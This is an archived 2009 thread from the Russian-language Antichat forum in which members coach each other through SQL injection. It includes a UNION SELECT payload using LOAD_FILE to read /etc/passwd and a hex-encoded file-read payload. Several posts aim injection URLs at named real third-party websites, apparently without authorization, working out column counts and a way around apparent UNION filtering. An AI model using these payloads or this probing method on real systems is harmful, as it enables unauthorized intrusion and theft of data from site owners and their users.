ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

25.01.2009, 21:20
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
kevmen
ПУТЬ ДО ФАЙЛА, об этом ВЕЗДЕ написано !!!!
Ты говорил , что читаешь это
https://forum.antichat.ru/thread43966.html
, так вот оттуда выдержка:
Рассмотрим функцию LOAD_FILE
Пример: http://xxx/news.php?id=-1' UNION SELECT 1,2,LOAD_FILE('etc/passwd'),4,5,6;
Для нее есть также несколько ограничений.
Должен быть указан полный путь к файлу.
|
|
|

25.01.2009, 21:59
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме: 397889
Репутация:
60
|
|
Сообщение от jokester
kevmen
ПУТЬ ДО ФАЙЛА, об этом ВЕЗДЕ написано !!!!
Ты говорил , что читаешь это
https://forum.antichat.ru/thread43966.html
, так вот оттуда выдержка:
я до этого еще не дошел,сейчас читаю
https://forum.antichat.ru/threadnav34338-1-10.html
|
|
|

25.01.2009, 21:30
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме: 21768337
Репутация:
3486
|
|
kevmen,
user()
==>
select file_priv from mysql.user where user = blablabla
@localhost не пиши в юзнейме
|
|
|

25.01.2009, 21:56
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме: 397889
Репутация:
60
|
|
jokester,спасибо)получилось,опять невнимательность)
http://localhost/view_cat.php?cat=1+union+select+1,2,LOAD_FILE(0x5a 3a5c686f6d655c6c6f63616c686f73745c7777775c7363686f 6f6c5c766965775f6361742e706870),4,5,6,7,8,9
|
|
|

25.01.2009, 22:03
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
http://www.mormontimes.com/mormon_voices/?id=3237+or+1=1
http://www.wiser.pitt.edu/apps/news/viewArticle.asp?article_id=68+or+1=1/*
что думаете?
|
|
|

25.01.2009, 23:02
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
Сообщение от sabe
что думаете?
первая )+order+by+32--+
вторая не открывается
|
|
|

25.01.2009, 23:38
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме: 397889
Репутация:
60
|
|
http://www.mormontimes.com/mormon_voices/?id=3237+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32
я так понял стоит фильтрация на union?
|
|
|

25.01.2009, 23:47
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Код:
http://www.mormontimes.com/mormon_voices/?id=3237)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32--+
Чтобы увидеть вывод: =-3237)+union...
|
|
|

25.01.2009, 23:54
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
Провел на форуме: 7283
Репутация:
0
|
|
с чего ты взял что там 32 поля?
+order+by+ - не прокатывает
+union+ - вроде как отключен
|
|
|

25.01.2009, 23:57
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Сообщение от KranC
с чего ты взял что там 32 поля?
+order+by+ - не прокатывает
+union+ - вроде как отключен
Код:
http://www.mormontimes.com/mormon_voices/?id=3237)+order+by+32--+
Читайте внимательнее, сверху же l1ght написал....
Что значит "union отключен"? )))
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|